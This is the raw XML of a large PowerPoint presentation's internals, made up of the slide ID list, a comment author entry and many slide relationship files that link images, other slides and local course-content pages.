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751" r:id="rId35"/>
    <p:sldId id="752" r:id="rId36"/>
    <p:sldId id="419" r:id="rId37"/>
    <p:sldId id="400" r:id="rId38"/>
    <p:sldId id="559" r:id="rId39"/>
    <p:sldId id="674" r:id="rId40"/>
    <p:sldId id="558" r:id="rId41"/>
    <p:sldId id="561" r:id="rId42"/>
    <p:sldId id="560" r:id="rId43"/>
    <p:sldId id="568" r:id="rId44"/>
    <p:sldId id="562" r:id="rId45"/>
    <p:sldId id="687" r:id="rId46"/>
    <p:sldId id="689" r:id="rId47"/>
    <p:sldId id="417" r:id="rId48"/>
    <p:sldId id="263" r:id="rId49"/>
    <p:sldId id="572" r:id="rId50"/>
    <p:sldId id="260" r:id="rId51"/>
    <p:sldId id="450" r:id="rId52"/>
    <p:sldId id="449" r:id="rId53"/>
    <p:sldId id="270" r:id="rId54"/>
    <p:sldId id="271" r:id="rId55"/>
    <p:sldId id="272" r:id="rId56"/>
    <p:sldId id="273" r:id="rId57"/>
    <p:sldId id="385" r:id="rId58"/>
    <p:sldId id="603" r:id="rId59"/>
    <p:sldId id="279" r:id="rId60"/>
    <p:sldId id="280" r:id="rId61"/>
    <p:sldId id="281" r:id="rId62"/>
    <p:sldId id="282" r:id="rId63"/>
    <p:sldId id="386" r:id="rId64"/>
    <p:sldId id="387" r:id="rId65"/>
    <p:sldId id="388" r:id="rId66"/>
    <p:sldId id="389" r:id="rId67"/>
    <p:sldId id="390" r:id="rId68"/>
    <p:sldId id="391" r:id="rId69"/>
    <p:sldId id="392" r:id="rId70"/>
    <p:sldId id="393" r:id="rId71"/>
    <p:sldId id="601" r:id="rId72"/>
    <p:sldId id="605" r:id="rId73"/>
    <p:sldId id="606" r:id="rId74"/>
    <p:sldId id="604" r:id="rId75"/>
    <p:sldId id="612" r:id="rId76"/>
    <p:sldId id="613" r:id="rId77"/>
    <p:sldId id="602" r:id="rId78"/>
    <p:sldId id="616" r:id="rId79"/>
    <p:sldId id="614" r:id="rId80"/>
    <p:sldId id="615" r:id="rId81"/>
    <p:sldId id="402" r:id="rId82"/>
    <p:sldId id="410" r:id="rId83"/>
    <p:sldId id="411" r:id="rId84"/>
    <p:sldId id="406" r:id="rId85"/>
    <p:sldId id="403" r:id="rId86"/>
    <p:sldId id="414" r:id="rId87"/>
    <p:sldId id="415" r:id="rId88"/>
    <p:sldId id="416" r:id="rId89"/>
    <p:sldId id="512" r:id="rId90"/>
    <p:sldId id="513" r:id="rId91"/>
    <p:sldId id="409" r:id="rId92"/>
    <p:sldId id="405" r:id="rId93"/>
    <p:sldId id="407" r:id="rId94"/>
    <p:sldId id="404" r:id="rId95"/>
    <p:sldId id="514" r:id="rId96"/>
    <p:sldId id="515" r:id="rId97"/>
    <p:sldId id="570" r:id="rId98"/>
    <p:sldId id="571" r:id="rId99"/>
    <p:sldId id="607" r:id="rId100"/>
    <p:sldId id="608" r:id="rId101"/>
    <p:sldId id="435" r:id="rId102"/>
    <p:sldId id="516" r:id="rId103"/>
    <p:sldId id="685" r:id="rId104"/>
    <p:sldId id="437" r:id="rId105"/>
    <p:sldId id="527" r:id="rId106"/>
    <p:sldId id="528" r:id="rId107"/>
    <p:sldId id="529" r:id="rId108"/>
    <p:sldId id="530" r:id="rId109"/>
    <p:sldId id="518" r:id="rId110"/>
    <p:sldId id="519" r:id="rId111"/>
    <p:sldId id="520" r:id="rId112"/>
    <p:sldId id="521" r:id="rId113"/>
    <p:sldId id="439" r:id="rId114"/>
    <p:sldId id="522" r:id="rId115"/>
    <p:sldId id="523" r:id="rId116"/>
    <p:sldId id="525" r:id="rId117"/>
    <p:sldId id="440" r:id="rId118"/>
    <p:sldId id="442" r:id="rId119"/>
    <p:sldId id="443" r:id="rId120"/>
    <p:sldId id="541" r:id="rId121"/>
    <p:sldId id="544" r:id="rId122"/>
    <p:sldId id="543" r:id="rId123"/>
    <p:sldId id="546" r:id="rId124"/>
    <p:sldId id="547" r:id="rId125"/>
    <p:sldId id="542" r:id="rId126"/>
    <p:sldId id="438" r:id="rId127"/>
    <p:sldId id="531" r:id="rId128"/>
    <p:sldId id="532" r:id="rId129"/>
    <p:sldId id="533" r:id="rId130"/>
    <p:sldId id="534" r:id="rId131"/>
    <p:sldId id="535" r:id="rId132"/>
    <p:sldId id="536" r:id="rId133"/>
    <p:sldId id="537" r:id="rId134"/>
    <p:sldId id="436" r:id="rId135"/>
    <p:sldId id="551" r:id="rId136"/>
    <p:sldId id="693" r:id="rId137"/>
    <p:sldId id="692" r:id="rId138"/>
    <p:sldId id="549" r:id="rId139"/>
    <p:sldId id="538" r:id="rId140"/>
    <p:sldId id="539" r:id="rId141"/>
    <p:sldId id="686" r:id="rId142"/>
    <p:sldId id="540" r:id="rId143"/>
    <p:sldId id="575" r:id="rId144"/>
    <p:sldId id="574" r:id="rId145"/>
    <p:sldId id="576" r:id="rId146"/>
    <p:sldId id="577" r:id="rId147"/>
    <p:sldId id="578" r:id="rId148"/>
    <p:sldId id="579" r:id="rId149"/>
    <p:sldId id="550" r:id="rId150"/>
    <p:sldId id="684" r:id="rId151"/>
    <p:sldId id="548" r:id="rId152"/>
    <p:sldId id="526" r:id="rId153"/>
    <p:sldId id="690" r:id="rId154"/>
    <p:sldId id="694" r:id="rId155"/>
    <p:sldId id="695" r:id="rId156"/>
    <p:sldId id="696" r:id="rId157"/>
    <p:sldId id="609" r:id="rId158"/>
    <p:sldId id="610" r:id="rId159"/>
    <p:sldId id="611" r:id="rId160"/>
    <p:sldId id="617" r:id="rId161"/>
    <p:sldId id="618" r:id="rId162"/>
    <p:sldId id="460" r:id="rId163"/>
    <p:sldId id="552" r:id="rId164"/>
    <p:sldId id="753" r:id="rId165"/>
    <p:sldId id="754" r:id="rId166"/>
    <p:sldId id="462" r:id="rId167"/>
    <p:sldId id="463" r:id="rId168"/>
    <p:sldId id="467" r:id="rId169"/>
    <p:sldId id="469" r:id="rId170"/>
    <p:sldId id="755" r:id="rId171"/>
    <p:sldId id="476" r:id="rId172"/>
    <p:sldId id="475" r:id="rId173"/>
    <p:sldId id="478" r:id="rId174"/>
    <p:sldId id="477" r:id="rId175"/>
    <p:sldId id="479" r:id="rId176"/>
    <p:sldId id="480" r:id="rId177"/>
    <p:sldId id="466" r:id="rId178"/>
    <p:sldId id="464" r:id="rId179"/>
    <p:sldId id="471" r:id="rId180"/>
    <p:sldId id="470" r:id="rId181"/>
    <p:sldId id="473" r:id="rId182"/>
    <p:sldId id="474" r:id="rId183"/>
    <p:sldId id="483" r:id="rId184"/>
    <p:sldId id="481" r:id="rId185"/>
    <p:sldId id="472" r:id="rId186"/>
    <p:sldId id="484" r:id="rId187"/>
    <p:sldId id="486" r:id="rId188"/>
    <p:sldId id="493" r:id="rId189"/>
    <p:sldId id="487" r:id="rId190"/>
    <p:sldId id="490" r:id="rId191"/>
    <p:sldId id="489" r:id="rId192"/>
    <p:sldId id="500" r:id="rId193"/>
    <p:sldId id="491" r:id="rId194"/>
    <p:sldId id="488" r:id="rId195"/>
    <p:sldId id="482" r:id="rId196"/>
    <p:sldId id="497" r:id="rId197"/>
    <p:sldId id="498" r:id="rId198"/>
    <p:sldId id="501" r:id="rId199"/>
    <p:sldId id="496" r:id="rId200"/>
    <p:sldId id="505" r:id="rId201"/>
    <p:sldId id="503" r:id="rId202"/>
    <p:sldId id="502" r:id="rId203"/>
    <p:sldId id="509" r:id="rId204"/>
    <p:sldId id="510" r:id="rId205"/>
    <p:sldId id="506" r:id="rId206"/>
    <p:sldId id="756" r:id="rId207"/>
    <p:sldId id="511" r:id="rId208"/>
    <p:sldId id="485" r:id="rId209"/>
    <p:sldId id="620" r:id="rId210"/>
    <p:sldId id="621" r:id="rId211"/>
    <p:sldId id="623" r:id="rId212"/>
    <p:sldId id="625" r:id="rId213"/>
    <p:sldId id="622" r:id="rId214"/>
    <p:sldId id="627" r:id="rId215"/>
    <p:sldId id="626" r:id="rId216"/>
    <p:sldId id="624" r:id="rId217"/>
    <p:sldId id="669" r:id="rId218"/>
    <p:sldId id="670" r:id="rId219"/>
    <p:sldId id="671" r:id="rId220"/>
    <p:sldId id="675" r:id="rId221"/>
    <p:sldId id="664" r:id="rId222"/>
    <p:sldId id="665" r:id="rId223"/>
    <p:sldId id="666" r:id="rId224"/>
    <p:sldId id="667" r:id="rId225"/>
    <p:sldId id="668" r:id="rId226"/>
    <p:sldId id="660" r:id="rId227"/>
    <p:sldId id="659" r:id="rId228"/>
    <p:sldId id="658" r:id="rId229"/>
    <p:sldId id="661" r:id="rId230"/>
    <p:sldId id="663" r:id="rId231"/>
    <p:sldId id="648" r:id="rId232"/>
    <p:sldId id="647" r:id="rId233"/>
    <p:sldId id="649" r:id="rId234"/>
    <p:sldId id="650" r:id="rId235"/>
    <p:sldId id="651" r:id="rId236"/>
    <p:sldId id="652" r:id="rId237"/>
    <p:sldId id="653" r:id="rId238"/>
    <p:sldId id="654" r:id="rId239"/>
    <p:sldId id="656" r:id="rId240"/>
    <p:sldId id="655" r:id="rId241"/>
    <p:sldId id="657" r:id="rId242"/>
    <p:sldId id="744" r:id="rId243"/>
    <p:sldId id="742" r:id="rId244"/>
    <p:sldId id="745" r:id="rId245"/>
    <p:sldId id="746" r:id="rId246"/>
    <p:sldId id="743" r:id="rId247"/>
    <p:sldId id="749" r:id="rId248"/>
    <p:sldId id="748" r:id="rId249"/>
    <p:sldId id="747" r:id="rId250"/>
    <p:sldId id="750" r:id="rId251"/>
    <p:sldId id="284" r:id="rId252"/>
    <p:sldId id="285" r:id="rId253"/>
    <p:sldId id="286" r:id="rId254"/>
    <p:sldId id="355" r:id="rId255"/>
    <p:sldId id="291" r:id="rId256"/>
    <p:sldId id="288" r:id="rId257"/>
    <p:sldId id="292" r:id="rId258"/>
    <p:sldId id="293" r:id="rId259"/>
    <p:sldId id="294" r:id="rId260"/>
    <p:sldId id="297" r:id="rId261"/>
    <p:sldId id="298" r:id="rId262"/>
    <p:sldId id="299" r:id="rId263"/>
    <p:sldId id="300" r:id="rId264"/>
    <p:sldId id="301" r:id="rId265"/>
    <p:sldId id="302" r:id="rId266"/>
    <p:sldId id="303" r:id="rId267"/>
    <p:sldId id="304" r:id="rId268"/>
    <p:sldId id="553" r:id="rId269"/>
    <p:sldId id="554" r:id="rId270"/>
    <p:sldId id="305" r:id="rId271"/>
    <p:sldId id="306" r:id="rId272"/>
    <p:sldId id="555" r:id="rId273"/>
    <p:sldId id="557" r:id="rId274"/>
    <p:sldId id="556" r:id="rId275"/>
    <p:sldId id="307" r:id="rId276"/>
    <p:sldId id="308" r:id="rId277"/>
    <p:sldId id="309" r:id="rId278"/>
    <p:sldId id="310" r:id="rId279"/>
    <p:sldId id="315" r:id="rId280"/>
    <p:sldId id="316" r:id="rId281"/>
    <p:sldId id="317" r:id="rId282"/>
    <p:sldId id="311" r:id="rId283"/>
    <p:sldId id="312" r:id="rId284"/>
    <p:sldId id="313" r:id="rId285"/>
    <p:sldId id="314" r:id="rId286"/>
    <p:sldId id="318" r:id="rId287"/>
    <p:sldId id="319" r:id="rId288"/>
    <p:sldId id="320" r:id="rId289"/>
    <p:sldId id="321" r:id="rId290"/>
    <p:sldId id="322" r:id="rId291"/>
    <p:sldId id="323" r:id="rId292"/>
    <p:sldId id="324" r:id="rId293"/>
    <p:sldId id="326" r:id="rId294"/>
    <p:sldId id="327" r:id="rId295"/>
    <p:sldId id="328" r:id="rId296"/>
    <p:sldId id="329" r:id="rId297"/>
    <p:sldId id="330" r:id="rId298"/>
    <p:sldId id="331" r:id="rId299"/>
    <p:sldId id="332" r:id="rId300"/>
    <p:sldId id="333" r:id="rId301"/>
    <p:sldId id="334" r:id="rId302"/>
    <p:sldId id="335" r:id="rId303"/>
    <p:sldId id="336" r:id="rId304"/>
    <p:sldId id="337" r:id="rId305"/>
    <p:sldId id="338" r:id="rId306"/>
    <p:sldId id="339" r:id="rId307"/>
    <p:sldId id="340" r:id="rId308"/>
    <p:sldId id="341" r:id="rId309"/>
    <p:sldId id="342" r:id="rId310"/>
    <p:sldId id="343" r:id="rId311"/>
    <p:sldId id="344" r:id="rId312"/>
    <p:sldId id="345" r:id="rId313"/>
    <p:sldId id="346" r:id="rId314"/>
    <p:sldId id="347" r:id="rId315"/>
    <p:sldId id="348" r:id="rId316"/>
    <p:sldId id="349" r:id="rId317"/>
    <p:sldId id="350" r:id="rId318"/>
    <p:sldId id="351" r:id="rId319"/>
    <p:sldId id="352" r:id="rId320"/>
    <p:sldId id="353" r:id="rId321"/>
    <p:sldId id="354" r:id="rId322"/>
    <p:sldId id="356" r:id="rId323"/>
    <p:sldId id="357" r:id="rId324"/>
    <p:sldId id="358" r:id="rId325"/>
    <p:sldId id="359" r:id="rId326"/>
    <p:sldId id="360" r:id="rId327"/>
    <p:sldId id="580" r:id="rId328"/>
    <p:sldId id="619" r:id="rId329"/>
    <p:sldId id="581" r:id="rId330"/>
    <p:sldId id="582" r:id="rId331"/>
    <p:sldId id="631" r:id="rId332"/>
    <p:sldId id="628" r:id="rId333"/>
    <p:sldId id="629" r:id="rId334"/>
    <p:sldId id="630" r:id="rId335"/>
    <p:sldId id="697" r:id="rId336"/>
    <p:sldId id="699" r:id="rId337"/>
    <p:sldId id="700" r:id="rId338"/>
    <p:sldId id="698" r:id="rId339"/>
    <p:sldId id="632" r:id="rId340"/>
    <p:sldId id="702" r:id="rId341"/>
    <p:sldId id="703" r:id="rId342"/>
    <p:sldId id="707" r:id="rId343"/>
    <p:sldId id="701" r:id="rId344"/>
    <p:sldId id="633" r:id="rId345"/>
    <p:sldId id="634" r:id="rId346"/>
    <p:sldId id="708" r:id="rId347"/>
    <p:sldId id="704" r:id="rId348"/>
    <p:sldId id="705" r:id="rId349"/>
    <p:sldId id="706" r:id="rId350"/>
    <p:sldId id="710" r:id="rId351"/>
    <p:sldId id="711" r:id="rId352"/>
    <p:sldId id="712" r:id="rId353"/>
    <p:sldId id="709" r:id="rId354"/>
    <p:sldId id="713" r:id="rId355"/>
    <p:sldId id="714" r:id="rId356"/>
    <p:sldId id="729" r:id="rId357"/>
    <p:sldId id="728" r:id="rId358"/>
    <p:sldId id="731" r:id="rId359"/>
    <p:sldId id="727" r:id="rId360"/>
    <p:sldId id="730" r:id="rId361"/>
    <p:sldId id="732" r:id="rId362"/>
    <p:sldId id="733" r:id="rId363"/>
    <p:sldId id="734" r:id="rId364"/>
    <p:sldId id="737" r:id="rId365"/>
    <p:sldId id="738" r:id="rId366"/>
    <p:sldId id="739" r:id="rId367"/>
    <p:sldId id="736" r:id="rId368"/>
    <p:sldId id="735" r:id="rId369"/>
    <p:sldId id="740" r:id="rId370"/>
    <p:sldId id="741" r:id="rId371"/>
    <p:sldId id="718" r:id="rId372"/>
    <p:sldId id="720" r:id="rId373"/>
    <p:sldId id="721" r:id="rId374"/>
    <p:sldId id="723" r:id="rId375"/>
    <p:sldId id="719" r:id="rId376"/>
    <p:sldId id="715" r:id="rId377"/>
    <p:sldId id="716" r:id="rId378"/>
    <p:sldId id="717" r:id="rId379"/>
    <p:sldId id="724" r:id="rId380"/>
    <p:sldId id="725" r:id="rId381"/>
    <p:sldId id="361" r:id="rId382"/>
    <p:sldId id="362" r:id="rId383"/>
    <p:sldId id="363" r:id="rId384"/>
    <p:sldId id="364" r:id="rId385"/>
    <p:sldId id="635" r:id="rId386"/>
    <p:sldId id="638" r:id="rId387"/>
    <p:sldId id="641" r:id="rId388"/>
    <p:sldId id="639" r:id="rId389"/>
    <p:sldId id="640" r:id="rId390"/>
    <p:sldId id="644" r:id="rId391"/>
    <p:sldId id="646" r:id="rId392"/>
    <p:sldId id="673" r:id="rId393"/>
    <p:sldId id="677" r:id="rId394"/>
    <p:sldId id="678" r:id="rId395"/>
    <p:sldId id="645" r:id="rId396"/>
    <p:sldId id="642" r:id="rId397"/>
    <p:sldId id="643" r:id="rId398"/>
    <p:sldId id="683" r:id="rId399"/>
    <p:sldId id="679" r:id="rId400"/>
    <p:sldId id="680" r:id="rId401"/>
    <p:sldId id="681" r:id="rId402"/>
    <p:sldId id="767" r:id="rId403"/>
    <p:sldId id="682" r:id="rId404"/>
    <p:sldId id="757" r:id="rId405"/>
    <p:sldId id="768" r:id="rId406"/>
    <p:sldId id="758" r:id="rId407"/>
    <p:sldId id="759" r:id="rId408"/>
    <p:sldId id="760" r:id="rId409"/>
    <p:sldId id="769" r:id="rId410"/>
    <p:sldId id="764" r:id="rId411"/>
    <p:sldId id="761" r:id="rId412"/>
    <p:sldId id="762" r:id="rId413"/>
    <p:sldId id="763" r:id="rId414"/>
    <p:sldId id="765" r:id="rId415"/>
    <p:sldId id="766" r:id="rId416"/>
    <p:sldId id="432" r:id="rId417"/>
    <p:sldId id="433" r:id="rId418"/>
    <p:sldId id="434" r:id="rId419"/>
    <p:sldId id="423" r:id="rId420"/>
    <p:sldId id="563" r:id="rId421"/>
    <p:sldId id="592" r:id="rId422"/>
    <p:sldId id="564" r:id="rId423"/>
    <p:sldId id="565" r:id="rId424"/>
    <p:sldId id="586" r:id="rId425"/>
    <p:sldId id="587" r:id="rId426"/>
    <p:sldId id="588" r:id="rId427"/>
    <p:sldId id="589" r:id="rId428"/>
    <p:sldId id="590" r:id="rId429"/>
    <p:sldId id="591" r:id="rId430"/>
    <p:sldId id="593" r:id="rId431"/>
    <p:sldId id="594" r:id="rId432"/>
    <p:sldId id="595" r:id="rId433"/>
    <p:sldId id="596" r:id="rId434"/>
    <p:sldId id="597" r:id="rId435"/>
    <p:sldId id="598" r:id="rId436"/>
    <p:sldId id="599" r:id="rId437"/>
    <p:sldId id="600" r:id="rId438"/>
    <p:sldId id="583" r:id="rId439"/>
    <p:sldId id="584" r:id="rId440"/>
    <p:sldId id="585" r:id="rId441"/>
    <p:sldId id="566" r:id="rId442"/>
    <p:sldId id="268" r:id="rId443"/>
    <p:sldId id="365" r:id="rId444"/>
    <p:sldId id="366" r:id="rId445"/>
    <p:sldId id="507" r:id="rId446"/>
    <p:sldId id="296" r:id="rId447"/>
    <p:sldId id="290" r:id="rId44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751"/>
            <p14:sldId id="752"/>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753"/>
            <p14:sldId id="754"/>
            <p14:sldId id="462"/>
            <p14:sldId id="463"/>
            <p14:sldId id="467"/>
            <p14:sldId id="469"/>
            <p14:sldId id="755"/>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756"/>
            <p14:sldId id="511"/>
            <p14:sldId id="485"/>
            <p14:sldId id="620"/>
            <p14:sldId id="621"/>
            <p14:sldId id="623"/>
            <p14:sldId id="625"/>
            <p14:sldId id="622"/>
            <p14:sldId id="627"/>
            <p14:sldId id="626"/>
            <p14:sldId id="624"/>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767"/>
            <p14:sldId id="682"/>
            <p14:sldId id="757"/>
            <p14:sldId id="768"/>
            <p14:sldId id="758"/>
            <p14:sldId id="759"/>
            <p14:sldId id="760"/>
            <p14:sldId id="769"/>
            <p14:sldId id="764"/>
            <p14:sldId id="761"/>
            <p14:sldId id="762"/>
            <p14:sldId id="763"/>
            <p14:sldId id="765"/>
            <p14:sldId id="766"/>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 id="2" name="도우" initials="도" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="b3fdc41ca2044c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84"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445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide444.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commentAuthors" Target="commentAuthor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viewProps" Target="viewProp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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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2023-11-01</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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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21.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.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 Target="slide301.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10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42.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1.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1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442.xml"/><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12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4.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2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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-70.html" TargetMode="Externa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2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1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slide" Target="slide101.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40.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.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slide" Target="slide101.xml"/><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44.png"/><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jpe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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide134.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36.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slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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13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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide141.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2.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4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42.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09.jpe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55.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6.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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hyperlink" Target="../Content/ItCS/Block/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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63.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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6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70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.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55.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73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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75.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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175.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78.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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178.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56.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9.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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-59.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82.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide182.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18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89.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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88.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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.jpeg"/><Relationship Id="rId16"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slide" Target="slide442.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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19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2.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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9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19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9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2.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slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25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03.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0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0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9.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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1.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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33.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.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205.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide166.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide198.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide266.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7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide183.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide177.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide82.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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21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hyperlink" Target="../Content/ItCS/calendar.php-108.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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21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21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21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218.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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/BGPlay-master/run_bgplay.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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2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png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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55.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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22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2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22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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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63.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.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23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3.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4.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5.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6.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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7.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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8.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide239.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4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1.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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82.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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3.jpe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4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4.jpe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4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24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24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slide" Target="slide442.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide45.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide40.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide420.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slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><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81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide253.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
